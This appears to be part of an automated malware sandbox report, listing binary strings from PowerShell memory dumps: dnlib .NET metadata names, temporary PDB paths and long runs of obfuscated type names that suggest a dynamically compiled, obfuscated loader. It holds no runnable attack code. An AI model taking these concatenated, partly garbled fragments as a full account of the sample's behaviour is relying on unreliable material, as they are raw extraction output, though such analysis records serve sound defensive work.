                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.538241032.000007FE89A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539125948.000007FE89C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.553778518.000007FE89C33000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.pdbhP source: powershell.exe, 00000007.00000002.470636519.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: ourcextyztp1socafxhnzza0gjsxcl1rkzsew0pyre0<get_properties>d__27dnlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodhslyep4awfbnyb1u8rbsntb38a4afohptd2mzqgvdnlib.dotnet.writerstartupstubsq8qss4llzhcnjexejoadnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparam<types>d__0dnlib.dotnet.writerchunklistbase`1dnlib.utilsextensions<>c__displayclass30_0my71kl4xinw8e0xtgingo2gyxb4x5fodyayfxiyuimgsfp4z9nb6ajq17hlidnlib.dotnetnativetypedqvnw84absj0xtxemlrqjaauyg4aua3luelovhtmdnlib.dotnet.mdrawenclogrow__staticarrayinittypesize=128dnlib.dotnet.pdb.dssisymunmanagednamespacednlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64<findinstanceconstructors>d__278dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefpl7hc44k8tmypzboczngs9nlmq4kc7siwyjgbn1tdnlib.dotnet.emitlocals8olzhtokwvp05p0orfdfv87ztvf26funczwwwmp0yywouezi2jtehxirrneptk0ous6nxa8xivpwsdnlib.dotneticontainsgenericparametergmomu1oytl08acv6tdidnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamewwgsmk4wix4ejl5ykka2`1wghn3k4rrx6pfkpondbuokole64rd75fllv6qs3sdnlib.dotnet.resourcesresourcereaderyhkxf8nmrqdnlulp3utaxues6n6rxrsppg8x1rdnlib.dotnetstrongnamepublickeyeebh3p4cnrtvnysgv8wgeqpdjq4cdumfgs2hf7wcsp3eeq4tfseo3d26puogdnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupshl4l9q6vqgb4ikhkpumiv6p8s6qg0nurku2q23vyaqi5ob0iq8dvtgp5nctmaypy4h11h8grbtua8krrncrt4hyas2kdq7jkhqwlptbh4azbqmwb4y4njxoza1bb4atp9drom8mhxvdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparertn4qulebpqyhdrqjwbgpgv5kieuydkct0jyhcgdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowopal2ms3ld2gvy1dayarch8bvsyhmmv6jwh2kkykrzd04r4lepbrvnli3avuen7v4rbcrfya3wvf79dnlib.dotnet.writermethodbodywriter<getrawrows>d__31dnlib.dotnetihasdeclsecuritydnlib.dotnet.pdb.dssisymunmanagedscopebnkxrvouyh2phcm06iqdvdhfh4ossggyoamut2vdnlib.dotnetimanagedentrypoint<findall>d__5<getextramonopaths>d__55startup_informationdtxtvs4som9sus7o6cfsihtl2w4svte7ike8ulm8fzfdxfxn29ope3g4hezuodoo3uknu3efqdlfv5iuhu0ouity2laa3vsgtdnlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderlvdvan4hx1ayggo4nkjqeoeb8q4hejf6qdb7pmrydnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparser<findall>d__9dnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatorqxap4g4atk84hqjqf60izbwobt4al65utclbbzhqdnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowyph8wk4l4tadoooo5jp5dnlib.ioimagestreamcreatordnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresource<getenumerator_nolock>d__45dnlib.dotnettyperefjkptur4v7edha9yyco6nuwbuvh4vndwhggklqkq7dnlib.dotnetpublickeydnlib.dotnetiassemblyreffindertlim3k4bfawabnjdnhhydnlib.dotnet.mdrawgenericparamconstraintrow__staticarrayinittypesize=24teims3le830y9ez4cd0buengtl3rj
                    Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.542528048.00000000129FE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: omhvy2rvxnqqup8sgutvz52hrrqdbddoybrls7dnlib.dotnet.emitnativemethodbodybvnbffsbyqatirpu5kednlib.dotnetfiledefuserdnlib.pemachinednlib.dotnetarraysigbasednlib.dotnetcaargumentadzfqw4etn2i2kb4bmljbxndcr4eldug6gn2ftbbdnlib.dotnetcorlibtypesigeiwh4p5emywfmaprbndughu5q53ncbmhb2s4uydnlib.dotnetelementtypey8tjb34txspg6vfeevmzc7darj4twldqjhfdqkuydnlib.dotnet.writernetresourceslpsi084jey4ecg6xhii2nsyimvixbra92ynyv0nrhpnvmieqs8grwehli4dnlib.dotnetszarraysigdnlib.dotnetmanifestresourceattributesgsnlgd4llsoan7qhm2gms3afae4lx1c5l15ssgakdnlib.dotnetmethodoverridednlib.dotnet.writerdeclsecuritywriterdnlib.dotnet.mdrawgenericparamrowdnlib.dotnetiassemblynmcarugvljx3c3gdr3muqmnsogzxivjwmy12vldnlib.dotnetgenericargumentsdnlib.dotnetfieldsigdnlib.dotnetexportedtypednlib.dotnetimporteroptionsn8dmuy4vrpcccyqcksdcbpqsof4vd1stlmrpaki6dnlib.threadinglistiteratedelegate`1origsection<findconstructors>d__279dnlib.peimagentheadersdnlib.threadingextensionsdnlib.dotnetmodulecontextdnlib.dotneteventattributesxguw5i219x7tceiv1lgdnlib.dotnet.writerhotpooldnlib.dotnet.writericustomattributewriterhelperdnlib.dotnetalltypeshelperakyj6voccoa7h4muebxzdnlib.dotnetsignaturealgorithmdnlib.dotnetmodulerefdnlib.iofilesectiondnlib.threadingenumerableiteratealldelegate`1cqw5yu4hkptbpg6tdletro5q7e4hivvskgc5vrlodnlib.dotnet.pdb.managedpdbexceptiondnlib.dotnetleafsigdnlib.iomemoryimagestreamgwjjuf4rswiuhoy99udkh0p0pu4r8jcmbomq9fvxdnlib.dotnetmoduledefdnlib.dotnetgenericparamconstraintdnlib.dotnet.mdstreamheaderdnlib.ioibinaryreaderdnlib.dotnetimemberforwardeddnlib.dotnet.mdrawfieldrvarowdnlib.dotnetmarshalblobreaderdnlib.dotnet.writerhottablexls2tx4v9icafzxd4m3kdnlib.dotnetsigcomparerdnlib.iohomeqqjxnvo8c7u2jeeh8f7pdnlib.dotnettypeattributesdnlib.dotnetclasslayoutdnlib.dotnet.writerwin32resourceschunkdnlib.utilsilistlistener`1dnlib.dotnet.mdrawassemblyrefprocessorrowdnlib.dotnetigenericparameterproviderdnlib.ioapidnlib.dotnet.mdusstreamdnlib.dotnet.mdstringsstreamdnlib.dotnetassemblyresolveexception<>c__displayclass3_0`1dnlib.dotnetsafearraymarshaltypez0lbwy4ejn8n7vanfykstzcqol4em9ifp7vedagydnlib.dotnetembeddedresourcednlib.dotnet.mdstorageflagsdnlib.dotnetinterfaceimpluserdnlib.dotnetimporterdnlib.dotnet.mdcolumnsize<findassembliesmodulesearchpaths>d__60vk8pvosix8lt3hhalecdnlib.dotnetresourcetypednlib.dotnet.emitmethodbodyreaderdnlib.dotnet.emitextensionswaatps4jdl8x42ihwcaylhe12mvmd4p1px5a5duwfehufv647t8pheb8iodnlib.dotnetfieldequalitycomparerdnlib.dotnetiimplementationdnlib.dotnet.mdraweventmaprowdnlib.dotnet.mdrawparamrowdnlib.dotnetistringdecrypterf91kooqgze2k03ehdeagxxrrqqiumag2qbgmhodnlib.dotnetpublickeybasednlib.dotnet.mdrawmethodptrrowpf5fgg4fihz1nm3bjq4jnxzdoh4f5vkwydgidxaednlib.dotnetfiledefdnlib.dotnet.mdrawpropertyrowdnlib.dotnet.writerhottable20qcikqi7jvlko2enmpydardhpx7m63ebwuiuhq4dnlib.ioioextensionsrhiarvoesuzeg8cqbmcxxlyplroeriknfdspsvlkdnlib.dotnet.writerextensionsdnlib.dotnetparameterlistyykz1zwjm3s4lejefmxdnlib.dotnetmethoddefuserdnlib.dotnetutf8stringequalitycomparerdnlib
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.pdbhP source: powershell.exe, 00000013.00000002.502469699.00000000024F3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.538241032.000007FE89A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539125948.000007FE89C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.553778518.000007FE89C33000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.542528048.00000000129FE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: .pdb= source: powershell.exe, 00000013.00000002.514899647.000000001A5DE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.pdb source: powershell.exe, 00000007.00000002.470636519.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
